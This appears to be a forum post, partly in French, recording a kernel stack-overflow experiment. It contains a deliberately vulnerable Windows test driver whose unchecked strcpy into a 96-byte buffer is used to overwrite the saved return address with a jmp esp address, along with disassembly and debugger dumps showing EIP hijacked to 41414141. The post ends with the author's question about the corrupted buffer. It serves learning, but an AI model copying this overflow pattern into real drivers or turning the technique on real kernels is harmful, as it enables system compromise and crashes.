ULONG Mofo(PUCHAR Str) { UCHAR Buff[96]; DbgPrint("&Buff : 0x%x\n", &Buff); __asm{int 3} //strcpy from ntoskrnl exports strcpy(Buff, Str); __asm{int 3} return 0; } NTSTATUS DriverUnload(IN PDRIVER_OBJECT DriverObject) { DbgPrint("Bye dude"); return STATUS_SUCCESS; } NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) { char Buff[96+8+1]; pDriverObject->DriverUnload=DriverUnload; memset(Buff, 0, sizeof(Buff)); memset(Buff, 0x41, 96+8); memcpy(Buff+100, &JmpESP, sizeof(ULONG)); Mofo(Buff); return STATUS_SUCCESS; } /*****************************************************/ kd> uf kbof!DriverEntry kbof!DriverEntry [c:\drivers\bof\kbof.c @ 90]: 90 fbfa14ea 8bff mov edi,edi 90 fbfa14ec 55 push ebp 90 fbfa14ed 8bec mov ebp,esp 90 fbfa14ef 83ec6c sub esp,6Ch 98 fbfa14f2 8b4508 mov eax,dword ptr [ebp+8] 98 fbfa14f5 57 push edi 103 fbfa14f6 6a1a push 1Ah 103 fbfa14f8 c74034d414fafb mov dword ptr [eax+34h],offset kbof!DriverUnload (fbfa14d4) 103 fbfa14ff 59 pop ecx 103 fbfa1500 33c0 xor eax,eax 103 fbfa1502 8d7d94 lea edi,[ebp-6Ch] 103 fbfa1505 f3ab rep stos dword ptr es:[edi] 103 fbfa1507 aa stos byte ptr es:[edi] 106 fbfa1508 6a1a push 1Ah 106 fbfa150a 59 pop ecx 106 fbfa150b b841414141 mov eax,41414141h 106 fbfa1510 8d7d94 lea edi,[ebp-6Ch] 106 fbfa1513 f3ab rep stos dword ptr es:[edi] 118 fbfa1515 8d4594 lea eax,[ebp-6Ch] 118 fbfa1518 50 push eax 118 fbfa1519 e876ffffff call kbof!Mofo (fbfa1494) 120 fbfa151e 33c0 xor eax,eax 120 fbfa1520 5f pop edi 121 fbfa1521 c9 leave 121 fbfa1522 c20800 ret 8 kd> uf kbof!Mofo kbof!Mofo [c:\drivers\bof\kbof.c @ 66]: 66 fbfa1494 8bff mov edi,edi 66 fbfa1496 55 push ebp 66 fbfa1497 8bec mov ebp,esp 66 fbfa1499 83ec60 sub esp,60h 69 fbfa149c 8d45a0 lea eax,[ebp-60h] 69 fbfa149f 50 push eax 69 fbfa14a0 688014fafb push offset kbof!Mofo+0xffffffff`ffffffec (fbfa1480) 69 fbfa14a5 e880000000 call kbof!DbgPrint (fbfa152a) 69 fbfa14aa 59 pop ecx 69 fbfa14ab 59 pop ecx 71 fbfa14ac cc int 3 73 fbfa14ad 8b4508 mov eax,dword ptr [ebp+8] 73 fbfa14b0 8d55a0 lea edx,[ebp-60h] 73 fbfa14b3 2bd0 sub edx,eax kbof!Mofo+0x21 [c:\drivers\bof\kbof.c @ 73]: 73 fbfa14b5 8a08 mov cl,byte ptr [eax] 73 fbfa14b7 880c02 mov byte ptr [edx+eax],cl 73 fbfa14ba 40 inc eax 73 fbfa14bb 84c9 test cl,cl 73 fbfa14bd 75f6 jne kbof!Mofo+0x21 (fbfa14b5) kbof!Mofo+0x2b [c:\drivers\bof\kbof.c @ 75]: 75 fbfa14bf cc int 3 76 fbfa14c0 33c0 xor eax,eax 77 fbfa14c2 c9 leave <=> mov esp, ebp : pop ebp 77 fbfa14c3 c20400 ret 4 /*****************************************************/ Kernel debugger connecté sur VM, loading du driver, on arrive sur le premier BP de Mofo &Buff : 0xfbdf5ba0 Break instruction exception - code 80000003 (first chance) kbof!Mofo+0x18: fbfa14ac cc int 3 kd> r esp esp=fbdf5ba0 kd> kp ChildEBP RetAddr fbdf5c00 fbfa151e kbof!Mofo(unsigned char * Str = 0xfbdf5c10 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")+0x18 [c:\drivers\bof\kbof.c @ 71] fbdf5c7c 805a69d3 kbof!DriverEntry(struct _DRIVER_OBJECT * pDriverObject = 0x80cfcbe0, struct _UNICODE_STRING * pRegistryPath = 0x80e40000)+0x34 [c:\drivers\bof\kbof.c @ 120] fbdf5d4c 805a6ca8 nt!IopLoadDriver+0x66c fbdf5d74 804e47fe nt!IopLoadUnloadDriver+0x45 fbdf5dac 8057dfed nt!ExpWorkerThread+0x100 fbdf5ddc 804fa477 nt!PspSystemThreadStartup+0x34 00000000 00000000 nt!KiThreadStartup+0x16 kd> db fbdf5ba0 (avant le strpy) fbdf5ba0 00 00 00 00 00 00 00 00-eb 9b 01 00 00 00 00 00 ................ fbdf5bb0 c8 cb cf 80 b0 53 ea 80-00 00 00 00 01 00 00 00 .....S.......... fbdf5bc0 01 00 00 00 00 00 00 00-30 6b eb 80 fe ff ff ff ........0k...... fbdf5bd0 b0 53 ea 80 00 00 00 00-40 20 56 80 40 20 56 80 .S......@ V.@ V. fbdf5be0 01 00 00 00 c4 cb cf 80-00 00 00 00 c8 cb cf 80 ................ fbdf5bf0 00 00 00 00 01 00 00 00-c0 00 00 00 c8 cb cf 80 ................ [saved ebp] [saved eip] [ str ] [saved edi de DriverEntry ] fbdf5c00 7c 5c df fb 1e 15 fa fb-10 5c df fb e0 cb cf 80 |\.......\...... fbdf5c10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA kd> t kbof!Mofo+0x2b: fbfa14bf cc int 3 kd> db fbdf5ba0 (après le strcpy) fbdf5ba0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA fbdf5bb0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA fbdf5bc0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA fbdf5bd0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA fbdf5be0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA fbdf5bf0 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA [saved ebp] [saved eip] [ str ] fbdf5c00 41 41 41 41 41 41 41 41-00 5c df fb e0 cb cf 80 AAAAAAAA.\...... fbdf5c10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA kd> t kbof!Mofo+0x2c: fbfa14c0 33c0 xor eax,eax kd> t kbof!Mofo+0x2e: fbfa14c2 c9 leave kd> t 41414141 ?? ??? kd> db fbdf5ba0 (pkoi le Buff a t'il été modifié ????????) fbdf5ba0 00 0d db ba 90 ff ff ff-00 00 00 00 00 00 00 00 ................ fbdf5bb0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ fbdf5bc0 00 00 00 00 23 00 00 00-00 00 00 00 23 00 00 00 ....#.......#... fbdf5bd0 23 00 00 00 90 ff ff ff-00 5b df fb 00 00 00 00 #........[...... fbdf5be0 30 00 00 00 cc 5d df fb-30 00 00 00 78 5c df fb 0....]..0...x\.. fbdf5bf0 3a 26 66 e1 00 00 00 00-41 41 41 41 00 00 00 00 :&f.....AAAA.... fbdf5c00 41 41 41 41 08 00 00 00-46 02 00 00 e0 cb cf 80 AAAA....F....... fbdf5c10 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA